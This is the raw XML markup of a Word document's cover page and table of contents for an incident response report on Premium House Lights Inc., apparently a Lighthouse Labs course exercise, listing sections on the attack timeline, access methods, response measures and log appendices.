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9315588"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="13C9B82D" w14:textId="63616629" w:rsidR="00541985" w:rsidRDefault="00541985"/>
        <w:p w14:paraId="32184713" w14:textId="39E1F25A" w:rsidR="00541985" w:rsidRPr="00776399" w:rsidRDefault="00541985" w:rsidP="00776399">
          <w:pPr>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01408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13CE6339" wp14:editId="6FC1333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485D18" w14:textId="3709613B" w:rsidR="00541985" w:rsidRPr="00776399" w:rsidRDefault="00000000">
                                  <w:pPr>
                                    <w:rPr>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      <w:sz w:val="72"/>
                                      <w:szCs w:val="72"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:sdt>
                                    <w:sdtPr>
                                      <w:rPr>
                                        <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>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41985" w:rsidRPr="00776399">
                                        <w:rPr>
                                          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                          <w:sz w:val="40"/>
                                          <w:szCs w:val="40"/>
                                        </w:rPr>
                                        <w:t>Incident Response Report: Premium House Lights Inc.</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CE6339" id="Group 126" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:540pt;height:556.55pt;z-index:-251715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485D18" w14:textId="3709613B" w:rsidR="00541985" w:rsidRPr="00776399" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="72"/>
                                <w:szCs w:val="72"/>
                              </w:rPr>
                            </w:pPr>
                            <w:sdt>
                              <w:sdtPr>
                                <w:rPr>
                                  <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>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41985" w:rsidRPr="00776399">
                                  <w:rPr>
                                    <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                    <w:sz w:val="40"/>
                                    <w:szCs w:val="40"/>
                                  </w:rPr>
                                  <w:t>Incident Response Report: Premium House Lights Inc.</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64224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61D7611B" wp14:editId="1EB5409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7F0E4" w14:textId="6D9D1B7D" w:rsidR="00541985" w:rsidRDefault="0054198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D7611B" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                    <v:stroke joinstyle="miter"/>
                    <v:path gradientshapeok="t" o:connecttype="rect"/>
                  </v:shapetype>
                  <v:shape id="Text Box 128" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:453pt;height:11.5pt;z-index:25176422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D87F0E4" w14:textId="6D9D1B7D" w:rsidR="00541985" w:rsidRDefault="0054198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709952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A7CD83F" wp14:editId="1280C37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486BD" w14:textId="23061849" w:rsidR="00541985" w:rsidRDefault="00776399">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:spacing w:before="40" w:after="40"/>
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="156082" w:themeColor="accent1"/>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                    <w:lang w:val="en-CA"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="156082" w:themeColor="accent1"/>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                    <w:lang w:val="en-CA"/>
                                  </w:rPr>
                                  <w:t>Curtis Crawford</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="5E3F6301" w14:textId="27F7E4E3" w:rsidR="00776399" w:rsidRPr="00776399" w:rsidRDefault="00776399">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:spacing w:before="40" w:after="40"/>
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="A02B93" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                    <w:lang w:val="en-CA"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="156082" w:themeColor="accent1"/>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                    <w:lang w:val="en-CA"/>
                                  </w:rPr>
                                  <w:t>Lighthouse Labs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7CD83F" id="Text Box 129" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:453pt;height:38.15pt;z-index:2517099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1C0486BD" w14:textId="23061849" w:rsidR="00541985" w:rsidRDefault="00776399">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:spacing w:before="40" w:after="40"/>
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                              <w:lang w:val="en-CA"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                              <w:lang w:val="en-CA"/>
                            </w:rPr>
                            <w:t>Curtis Crawford</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="5E3F6301" w14:textId="27F7E4E3" w:rsidR="00776399" w:rsidRPr="00776399" w:rsidRDefault="00776399">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:spacing w:before="40" w:after="40"/>
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="A02B93" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                              <w:lang w:val="en-CA"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                              <w:lang w:val="en-CA"/>
                            </w:rPr>
                            <w:t>Lighthouse Labs</w:t>
                          </w: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70D7E9F2" wp14:editId="2636E5D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3B8A2B" w14:textId="191C3E5C" w:rsidR="00541985" w:rsidRDefault="00776399">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D7E9F2" id="Rectangle 130" o:spid="_x0000_s1031" style="position:absolute;margin-left:-4.4pt;margin-top:0;width:46.8pt;height:77.75pt;z-index:2516556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3B8A2B" w14:textId="191C3E5C" w:rsidR="00541985" w:rsidRDefault="00776399">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CA"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="1964464849"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="40DE12C0" w14:textId="0ED91F22" w:rsidR="00541985" w:rsidRDefault="00541985">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1A333E7A" w14:textId="5DE529DD" w:rsidR="009F25F3" w:rsidRDefault="00541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0595373" w:history="1">
            <w:r w:rsidR="009F25F3" w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summary</w:t>
            </w:r>
            <w:r w:rsidR="009F25F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="009F25F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="009F25F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595373 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="009F25F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="009F25F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="009F25F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="009F25F3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3AF08492" w14:textId="49C290BB" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595374" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Incident Timeline</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595374 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="381A9BFF" w14:textId="3462A4E3" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595375" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Technical Analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595375 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FDF5FFF" w14:textId="2DAE02CA" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595376" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Attack Origin and Impact</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595376 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6772BC16" w14:textId="1C4DD606" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595377" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>How Systems Were Accessed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595377 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37A67AF9" w14:textId="17C08AB1" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595378" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Inadvertent Mistakes That Let the Accident</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595378 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08C87A47" w14:textId="0173189B" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595379" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Incident Response</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595379 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E07A4C7" w14:textId="5D58AA85" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595380" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Measures Used to Stop and Address the Incident</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595380 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5649157F" w14:textId="1D1A12D5" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595381" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Post-Incident Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595381 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CCA939C" w14:textId="664F1352" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595382" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Future Protection Against Similar Attacks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595382 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="128DA5C9" w14:textId="31913EC0" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595383" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595383 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F1DC8E3" w14:textId="13858110" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595384" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MySQL Database Access Logs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595384 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14B0A780" w14:textId="1BE65E21" w:rsidR="009F25F3" w:rsidRDefault="009F25F3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-CA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc180595385" w:history="1">
            <w:r w:rsidRPr="00DC09D5">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network Logs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180595385 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
